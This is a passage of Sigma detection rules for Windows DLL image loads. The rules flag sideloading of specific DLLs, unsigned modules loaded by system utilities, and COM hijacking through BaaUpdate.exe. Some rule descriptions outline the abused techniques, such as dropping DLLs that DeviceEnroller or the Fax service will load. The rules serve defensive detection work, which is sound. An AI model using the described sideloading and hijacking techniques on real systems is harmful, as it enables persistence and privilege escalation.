    "content": "title: Potential RoboForm.DLL Sideloading\nid: f64c9b2d-b0ad-481d-9d03-7fc75020892a\nstatus: test\ndescription: Detects potential DLL sideloading of \"roboform.dll\", a DLL used by RoboForm Password Manager\nreferences:\n    - https://twitter.com/StopMalvertisin/status/1648604148848549888\n    - https://twitter.com/t3ft3lb/status/1656194831830401024\n    - https://www.roboform.com/\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-14\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\roboform.dll'\n            - '\\roboform-x64.dll'\n    filter_main_path:\n        Image|startswith:\n            - ' C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\'\n            - ' C:\\Program Files\\Siber Systems\\AI RoboForm\\'\n        Image|endswith:\n            - '\\robotaskbaricon.exe'\n            - '\\robotaskbaricon-x64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - If installed on a per-user level, the path would be located in \"AppData\\Local\". Add additional filters to reflect this mode of installation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_shell_chrome_api.yml",
    "content": "title: DLL Sideloading Of ShellChromeAPI.DLL\nid: ee4c5d06-3abc-48cc-8885-77f1c20f4451\nrelated:\n    - id: e173ad47-4388-4012-ae62-bd13f71c18a8\n      type: similar\nstatus: test\ndescription: |\n    Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\n    Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\nreferences:\n    - https://mobile.twitter.com/0gtweet/status/1564131230941122561\n    - https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-01\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        # The DLL shouldn't exist on Windows anymore. If for some reason you still have it. You could filter out legitimate calls\n        ImageLoaded|endswith: '\\ShellChromeAPI.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_shelldispatch.yml",
    "content": "title: Potential ShellDispatch.DLL Sideloading\nid: 844f8eb2-610b-42c8-89a4-47596e089663\nstatus: test\ndescription: Detects potential DLL sideloading of \"ShellDispatch.dll\"\nreferences:\n    - https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-20\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\ShellDispatch.dll'\n    filter_main_legit_path:\n        - ImageLoaded|contains|all:\n              - ':\\Users\\'\n              - '\\AppData\\Local\\Temp\\'\n        - ImageLoaded|contains: ':\\Windows\\Temp\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Some installers may trigger some false positives\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_smadhook.yml",
    "content": "title: Potential SmadHook.DLL Sideloading\nid: 24b6cf51-6122-469e-861a-22974e9c1e5b\nstatus: test\ndescription: Detects potential DLL sideloading of \"SmadHook.dll\", a DLL used by SmadAV antivirus\nreferences:\n    - https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\n    - https://www.qurium.org/alerts/targeted-malware-against-crph/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-01\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\SmadHook32c.dll'\n            - '\\SmadHook64c.dll'\n    filter_main_legit_path:\n        Image:\n            - 'C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe'\n            - 'C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe'\n            - 'C:\\Program Files\\SMADAV\\SmadavProtect32.exe'\n            - 'C:\\Program Files\\SMADAV\\SmadavProtect64.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\SMADAV\\'\n            - 'C:\\Program Files\\SMADAV\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_solidpdfcreator.yml",
    "content": "title: Potential SolidPDFCreator.DLL Sideloading\nid: a2edbce1-95c8-4291-8676-0d45146862b3\nstatus: test\ndescription: Detects potential DLL sideloading of \"SolidPDFCreator.dll\"\nreferences:\n    - https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-05-07\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\SolidPDFCreator.dll'\n    filter_main_path:\n        Image|endswith: '\\SolidPDFCreator.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\'\n            - 'C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_third_party.yml",
    "content": "title: Third Party Software DLL Sideloading\nid: f9df325d-d7bc-4a32-8a1a-2cc61dcefc63\nstatus: test\ndescription: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)\nreferences:\n    - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)\ndate: 2022-08-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    # Lenovo\n    selection_lenovo:\n        ImageLoaded|endswith: '\\commfunc.dll'\n    filter_lenovo:\n        - ImageLoaded|contains: '\\AppData\\local\\Google\\Chrome\\Application\\'\n        - ImageLoaded|startswith:\n              - 'C:\\Program Files\\Lenovo\\Communications Utility\\'\n              - 'C:\\Program Files (x86)\\Lenovo\\Communications Utility\\'\n    # Toshiba\n    selection_toshiba:\n        ImageLoaded|endswith: '\\tosbtkbd.dll'\n    filter_toshiba:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\'\n            - 'C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\'\n    # Zoom (FP with System32)\n    # selection_zoom:\n    #     ImageLoaded|endswith: '\\version.dll'\n    # filter_zoom:\n    #     ImageLoaded|startswith: 'C:\\Users\\'\n    #     ImageLoaded|contains: '\\AppData\\Roaming\\Zoom\\bin\\'\n    condition: (selection_lenovo and not filter_lenovo) or (selection_toshiba and not filter_toshiba)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_ualapi.yml",
    "content": "title: Fax Service DLL Search Order Hijack\nid: 828af599-4c53-4ed2-ba4a-a9f835c434ea\nstatus: test\ndescription: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.\nreferences:\n    - https://windows-internals.com/faxing-your-way-to-system/\nauthor: NVISO\ndate: 2020-05-04\nmodified: 2022-06-02\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\fxssvc.exe'\n        ImageLoaded|endswith: 'ualapi.dll'\n    filter:\n        ImageLoaded|startswith: 'C:\\Windows\\WinSxS\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_vivaldi_elf.yml",
    "content": "title: Potential Vivaldi_elf.DLL Sideloading\nid: 2092cacb-d77b-4f98-ab0d-32b32f99a054\nstatus: test\ndescription: Detects potential DLL sideloading of \"vivaldi_elf.dll\"\nreferences:\n    - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-08-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\vivaldi_elf.dll'\n    filter_main_legit_path:\n        Image|endswith: '\\Vivaldi\\Application\\vivaldi.exe'\n        ImageLoaded|contains: '\\Vivaldi\\Application\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_vmguestlib.yml",
    "content": "title: VMGuestLib DLL Sideload\nid: 70e8e9b4-6a93-4cb7-8cde-da69502e7aff\nstatus: test\ndescription: Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.\nreferences:\n    - https://decoded.avast.io/martinchlumecky/png-steganography/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-01\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|contains|all:\n            - '\\VMware\\VMware Tools\\vmStatsProvider\\win32'\n            - '\\vmGuestLib.dll'\n        Image|endswith: '\\Windows\\System32\\wbem\\WmiApSrv.exe'\n    filter:\n        Signed: 'true'\n    condition: selection and not filter\nfalsepositives:\n    - FP could occur if the legitimate version of vmGuestLib already exists on the system\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_vmmap_dbghelp_signed.yml",
    "content": "title: VMMap Signed Dbghelp.DLL Potential Sideloading\nid: 98ffaed4-aec2-4e04-9b07-31492fe68b3d\nrelated:\n    - id: 273a8dd8-3742-4302-bcc7-7df5a80fe425\n      type: similar\nstatus: test\ndescription: Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.\nreferences:\n    - https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-05\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|contains: 'C:\\Debuggers\\dbghelp.dll'\n        Image|endswith:\n            - '\\vmmap.exe'\n            - '\\vmmap64.exe'\n        Signed: 'true'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml",
    "content": "title: VMMap Unsigned Dbghelp.DLL Potential Sideloading\nid: 273a8dd8-3742-4302-bcc7-7df5a80fe425\nrelated:\n    - id: 98ffaed4-aec2-4e04-9b07-31492fe68b3d\n      type: similar\nstatus: test\ndescription: Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.\nreferences:\n    - https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-28\nmodified: 2023-09-05\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|contains: 'C:\\Debuggers\\dbghelp.dll'\n        Image|endswith:\n            - '\\vmmap.exe'\n            - '\\vmmap64.exe'\n    filter_main_signed:\n        Signed: 'true'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_vmware_xfer.yml",
    "content": "title: Potential DLL Sideloading Via VMware Xfer\nid: 9313dc13-d04c-46d8-af4a-a930cc55d93b\nstatus: test\ndescription: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL\nreferences:\n    - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-02\nmodified: 2023-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith: '\\VMwareXferlogs.exe'\n        ImageLoaded|endswith: '\\glib-2.0.dll'\n    filter: # VMware might be installed in another path so update the rule accordingly\n        ImageLoaded|startswith: 'C:\\Program Files\\VMware\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_waveedit.yml",
    "content": "title: Potential Waveedit.DLL Sideloading\nid: 71b31e99-9ad0-47d4-aeb5-c0ca3928eeeb\nstatus: test\ndescription: Detects potential DLL sideloading of \"waveedit.dll\", which is part of the Nero WaveEditor audio editing software.\nreferences:\n    - https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-14\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\waveedit.dll'\n    filter_main_legit_path:\n        Image:\n            - 'C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe'\n            - 'C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\'\n            - 'C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_wazuh.yml",
    "content": "title: Potential Wazuh Security Platform DLL Sideloading\nid: db77ce78-7e28-4188-9337-cf30e2b3ba9f\nstatus: test\ndescription: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform\nreferences:\n    - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html\nauthor: X__Junior (Nextron Systems)\ndate: 2023-03-13\nmodified: 2023-05-12\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\libwazuhshared.dll'\n            - '\\libwinpthread-1.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    filter_optional_mingw64:\n        # Note: Many third party apps installed in \"AppData\" or \"ProgramData\" and leverage \"mingw64\" make use of \"libwinpthread-1.dll\"\n        # In production its best to make a list of these apps and replace this filter with a specific one.\n        ImageLoaded|contains:\n            - '\\AppData\\Local\\'\n            - '\\ProgramData\\'\n        ImageLoaded|endswith: '\\mingw64\\bin\\libwinpthread-1.dll'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_windows_defender.yml",
    "content": "title: Potential Mpclient.DLL Sideloading\nid: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc\nrelated:\n    - id: 7002aa10-b8d4-47ae-b5ba-51ab07e228b9\n      type: similar\nstatus: test\ndescription: Detects potential sideloading of \"mpclient.dll\" by Windows Defender processes (\"MpCmdRun\" and \"NisSrv\") from their non-default directory.\nreferences:\n    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool\nauthor: Bhabesh Raj\ndate: 2022-08-02\nmodified: 2023-08-04\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\mpclient.dll'\n        Image|endswith:\n            - '\\MpCmdRun.exe'\n            - '\\NisSrv.exe'\n    filter_main_known_locations:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Windows Defender\\'\n            - 'C:\\Program Files\\Microsoft Security Client\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_wwlib.yml",
    "content": "title: Potential WWlib.DLL Sideloading\nid: e2e01011-5910-4267-9c3b-4149ed5479cf\nstatus: test\ndescription: Detects potential DLL sideloading of \"wwlib.dll\"\nreferences:\n    - https://twitter.com/WhichbufferArda/status/1658829954182774784\n    - https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/\n    - https://securelist.com/apt-luminousmoth/103332/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-05-18\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\wwlib.dll'\n    filter_main_path:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Office\\'\n            - 'C:\\Program Files\\Microsoft Office\\'\n        Image|endswith: '\\winword.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Office\\'\n            - 'C:\\Program Files\\Microsoft Office\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_susp_baaupdate_dll_load.yml",
    "content": "title: BaaUpdate.exe Suspicious DLL Load\nid: 6e8fe0a8-ba0b-4a93-8f9e-82657e7a5984\nrelated:\n    - id: 9f38c1db-e2ae-40bf-81d0-5b68f73fb512 # Suspicious BitLocker Access Agent Update Utility Execution\n      type: similar\nstatus: experimental\ndescription: |\n    Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking.\n    This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94)\n    which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account.\nreferences:\n    - https://github.com/rtecCyberSec/BitlockMove\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-18\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\BaaUpdate.exe'\n        ImageLoaded|endswith: '.dll'\n        ImageLoaded|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Contacts\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\Links\\'\n            - '\\Music\\'\n            - '\\Pictures\\'\n            - '\\ProgramData\\'\n            - '\\Temporary Internet'\n            - '\\Videos\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml",
    "content": "title: Unsigned Module Loaded by ClickOnce Application\nid: 060d5ad4-3153-47bb-8382-43e5e29eda92\nstatus: test\ndescription: Detects unsigned module load by ClickOnce application.\nreferences:\n    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\nauthor: '@SerkinValery'\ndate: 2023-06-08\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_path:\n        Image|contains: '\\AppData\\Local\\Apps\\2.0\\'\n    selection_sig_status:\n        - Signed: 'false'\n        - SignatureStatus: 'Expired'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_susp_dll_load_system_process.yml",
    "content": "title: DLL Load By System Process From Suspicious Locations\nid: 9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c\nstatus: test\ndescription: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as \"C:\\Users\\Public\"\nreferences:\n    - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-17\nmodified: 2023-09-18\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|startswith: 'C:\\Windows\\'\n        ImageLoaded|startswith:\n            # TODO: Add more suspicious paths as you see fit in your env\n            - 'C:\\Users\\Public\\'\n            - 'C:\\PerfLogs\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_susp_python_image_load.yml",
    "content": "title: Python Image Load By Non-Python Process\nid: cbb56d62-4060-40f7-9466-d8aaf3123f83\nstatus: test\ndescription: |\n    Detects the image load of \"Python Core\" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code.\n    Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables.\n    Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures.\nreferences:\n    - https://www.py2exe.org/\n    - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/\nauthor: Patrick St. John, OTR (Open Threat Research)\ndate: 2020-05-03\nmodified: 2025-08-18\ntags:\n    - attack.defense-evasion\n    - attack.t1027.002\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Description: 'Python Core'\n    filter_main_generic:\n        - Image|contains: 'Python'  # FPs with python38.dll, python.exe etc.\n        - Image|startswith:\n              - 'C:\\Program Files\\'\n              - 'C:\\Program Files (x86)\\'\n              - 'C:\\ProgramData\\Anaconda3\\' # Comment out if you don't use Anaconda in your environment\n    filter_optional_null_image:\n        Image: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate Py2Exe Binaries\n    - Known false positive caused with Python Anaconda\n    - Various legitimate software is bundled from Python code into executables\nlevel: low\n"
  },
  {
    "path": "rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml",
    "content": "title: DotNet CLR DLL Loaded By Scripting Applications\nid: 4508a70e-97ef-4300-b62b-ff27992990ea\nstatus: test\ndescription: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.\nreferences:\n    - https://github.com/tyranid/DotNetToJScript\n    - https://thewover.github.io/Introducing-Donut/\n    - https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html\n    - https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008\nauthor: omkar72, oscd.community\ndate: 2020-10-14\nmodified: 2023-02-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\cmstp.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\msxsl.exe'\n            - '\\regsvr32.exe'\n            # - '\\svchost.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n        ImageLoaded|endswith:\n            - '\\clr.dll'\n            - '\\mscoree.dll'\n            - '\\mscorlib.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_susp_unsigned_dll.yml",
    "content": "title: Unsigned DLL Loaded by Windows Utility\nid: b5de0c9a-6f19-43e0-af4e-55ad01f550af\nstatus: test\ndescription: |\n    Detects windows utilities loading an unsigned or untrusted DLL.\n    Adversaries often abuse those programs to proxy execution of malicious code.\nreferences:\n    - https://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion\n    - https://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql\n    - https://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-02-28\nmodified: 2025-10-07\ntags:\n    - attack.t1218.011\n    - attack.t1218.010\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith:\n            # Note: Add additional utilities that allow the loading of DLLs\n            - '\\InstallUtil.exe'\n            - '\\RegAsm.exe'\n            - '\\RegSvcs.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n    filter_main_signed:\n        Signed: 'true'\n    filter_main_sig_status:\n        SignatureStatus:\n            - 'errorChaining'\n            - 'errorCode_endpoint'\n            - 'errorExpired'\n            - 'trusted'\n            - 'Valid'\n    filter_main_signed_null:\n        Signed: null\n    filter_main_signed_empty:\n        Signed:\n            - ''\n            - '-'\n    filter_main_sig_status_null:\n        SignatureStatus: null\n    filter_main_sig_status_empty:\n        SignatureStatus:\n            - ''\n            - '-'\n    filter_main_windows_installer:\n        Image:\n            - 'C:\\Windows\\SysWOW64\\rundll32.exe'\n            - 'C:\\Windows\\System32\\rundll32.exe'\n        ImageLoaded|startswith: 'C:\\Windows\\Installer\\'\n        ImageLoaded|endswith:\n            - '.tmp-\\Microsoft.Deployment.WindowsInstaller.dll'\n            - '.tmp-\\Avira.OE.Setup.CustomActions.dll'\n    filter_main_assembly:\n        Image|startswith:\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\Microsoft.NET\\Framework64'\n        Image|endswith: '\\RegAsm.exe'\n        ImageLoaded|endswith: '.dll'\n        ImageLoaded|startswith: 'C:\\Windows\\assembly\\NativeImages'\n    filter_optional_klite_codec:\n        Image:\n            - 'C:\\Windows\\SysWOW64\\regsvr32.exe'\n            - 'C:\\Windows\\System32\\regsvr32.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\K-Lite Codec Pack\\'\n            - 'C:\\Program Files\\K-Lite Codec Pack\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_thor_unsigned_execution.yml",
    "content": "title: Suspicious Unsigned Thor Scanner Execution\nid: ea5c131b-380d-49f9-aeb3-920694da4d4b\nstatus: stable\ndescription: Detects loading and execution of an unsigned thor scanner binary.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-29\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n        ImageLoaded|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    filter_main:\n        Signed: 'true'\n        SignatureStatus: 'valid'\n        Signature: 'Nextron Systems GmbH'\n    condition: selection and not filter_main\nfalsepositives:\n    - Other legitimate binaries named \"thor.exe\" that aren't published by Nextron Systems\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml",
